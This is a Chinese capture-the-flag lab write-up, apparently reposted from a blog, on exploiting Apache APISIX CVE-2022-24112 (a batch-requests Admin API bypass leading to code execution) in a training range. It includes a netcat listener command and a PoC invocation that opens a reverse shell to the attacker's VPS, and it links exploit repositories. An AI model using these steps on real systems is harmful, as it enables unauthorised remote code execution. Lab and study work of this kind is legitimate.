0


春秋云境:CVE-2022-24112

春秋云境:CVE-2022-24112

文章合集:春秋云境系列靶场记录(合集)


Apache APISIX batch-requests SSRF RCE 漏洞:CVE-2022-24112

在这里插入图片描述

漏洞介绍

Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 Apache APISIX中存在远程代码执行漏洞,该漏洞源于产品的batch-requests插件未对用户的批处理请求进行有效限制。攻击者可通过该漏洞绕过Admin API的IP限制,容易导致远程代码执行。


解题步骤

题外话

这个漏洞做费了些事,因为开始不懂这个漏洞到底什么意思,最后参考了很多篇文章,才算是明白,这里附上我参考的几篇文章:
1、https://github.com/apache/apisix/blob/ec0fc2ceaf04a20b0bd0ebdaad67296a1d3f621c/docs/zh/latest/plugins/batch-requests.md
2、星阑实验室-【技术干货】CVE-2022-24112 Apache APISIX 远程代码执行漏洞:https://mp.weixin.qq.com/s/S75GkwmsaTggBxcX05GY5Q
3、长白山攻防实验室-Apache APISIX Dashboard(CVE-2022-24112)命令执行漏洞方式利用:https://mp.weixin.qq.com/s/rfN_BtCuwVCS90jwCoA48g
4、https://github.com/twseptian/cve-2022-24112

参考网上的两位师傅的POC,针对春秋云境靶场稍做了修改,修改后的POC放这了:https://github.com/Acczdy/CVE-2022-24112_POC,有需要可以自己下载,或者可以直接参考上面的POC,进入正题:

  1. 访问URL,得到的是404页面在这里插入图片描述
  2. 直接使用工具进行反弹shell
  3. VPS开启监听:nc -lvvp 18888在这里插入图片描述
  4. 此处使用的是我修改的在Linux环境中适用的脚本,也有Windows环境使用的,有需要自己可以下载,进入脚本目录,参照下面格式进行运行:python3 CVE-2022-24112_Linux_by_twseptian.py -t eci-eninecsteC2zon6q0xod9n5r7me4ih.cloudeci1.ichunqiu.com:9080 -L VPS_IP -P VPS_PODRPODR

在这里插入图片描述

  1. 返回VPS查看获取flag在这里插入图片描述

文章合集:春秋云境系列靶场记录(合集)


本文转载自: https://blog.csdn.net/laobanjiull/article/details/128170570
版权归原作者 Acczdy 所有, 如有侵权,请联系我们删除。

“春秋云境:CVE-2022-24112”的评论:

还没有评论